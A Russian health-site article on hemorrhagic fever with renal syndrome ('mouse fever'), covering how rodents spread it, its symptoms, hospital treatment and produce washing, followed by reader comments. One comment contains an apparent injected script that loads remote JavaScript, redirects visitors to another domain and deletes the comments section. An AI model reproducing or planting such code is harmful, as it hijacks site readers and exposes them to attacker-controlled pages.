Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Мышиная лихорадка. Как уб...  >>  Мышиная лихорадка. Как уберечься от опасного вируса
 
Обратная связь
 

Мышиная лихорадка. Как уберечься от опасного вируса

Размер шрифта
03 февраля 2012 08:00
  • google_analytics: false
  • Нравится

Мыши могут фактически уничтожить наши почки. Дело в том, что они переносят опаснейшее заболевание – мышиную лихорадку, которая убивает наши почки.

1 

Геморрагическая лихорадка с почечным синдромом – острая вирусная болезнь, характеризующаяся лихорадкой, общей интоксикацией, своеобразным поражением почек и развитием тромбогеморрагического синдрома. Лихорадка получила название «мышиной», так как ее переносят грызуны. На европейской территории России до 70 % мышей являются носителями вируса.

У мышей эта инфекция проявляется в виде латентного вирусоносительства. Возбудитель выделяется с калом, мочой. Заражение человека происходит при вдыхании высохших испражнений инфицированных грызунов. Другими словами, для заражения не нужно контакта с мышью.

Воротами инфекции является слизистая оболочка респираторного тракта, реже кожа и слизистая оболочка органов пищеварения. Вирус попадает сначала в легкие. Но к ним подступиться он не может, зато он поражает наши сосуды и самые чувствительные органы – почки.

Симптомы

  • повышение температуры, которая достигает максимальных цифр уже в первые или вторые сутки от начала заболевания и держится 10-12 дней
  • головная боль, бессонница, боль в горле

Вначале болезнь ничем не отличается от простуды и гриппа. Через три дня состояние больного ухудшается. На груди и в подмышечной области появляются высыпания – линейно расположенные кровоизлияния в виде «удара хлыста». Впрочем, кровоизлияния могут быть в любом месте. Затем возникает резкая боль в пояснице, перестает вырабатываться моча из-за отказа почек. Возникает острая почечная недостаточность. Это самая опасная стадия болезни – без лечения человек гибнет.

Лечение

Мышиную лихорадку нельзя вылечить амбулаторно, нужна срочная госпитализация и постельный режим. Существует лекарство, которое убивает вирус – это рибаверин. При развитии острой почечной недостаточности показан диализ, который замещает функции почки и выводит мочу.

Профилактика

Вакцины от болезни нет. Чтобы уберечь себя от болезни, тщательно мойте овощи и фрукты, так как они могут быть загрязнены испражнениями грызунов.



Сюжеты по теме:
Мышиная лихорадка. Как уберечься от опасного вируса

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

03 февраля 2012 в 19:44

Цитировать   |   Пожаловаться

Получается, частично правы те, кто рассказывают, что можно проблемы получить от бананов, если не мыть их и/или руки, т. к. обычные овощи/фрукты моют, а бананы (снаружи) - «никто и никогда»; а везут их из тёплых стран в трюмах, в которых «полчищами бегают крысы»?

2 - Гость

28 апреля 2013 в 23:31

Цитировать   |   Пожаловаться

кто знает,можно ли заразится от хомяка-альбиноса?дома был хомяк около недели.теперь ребенок болеет.симптомы схожи...

3 - zzzzzz

30 июня 2015 в 23:57

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как правильно измерять температуру   Как не стать жертвой голубей-убийц?!   С помощью слепых крыс ученые узнали, как победить рак   Боль в спине  

Слайдшоу

Термометр Flex Temp Срочно! В Ставропольском крае обнаружена сибирская язва!
Что заставляет нас потеть Жизнь с диагнозом ВИЧ или СПИД: правда и вымыслы
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.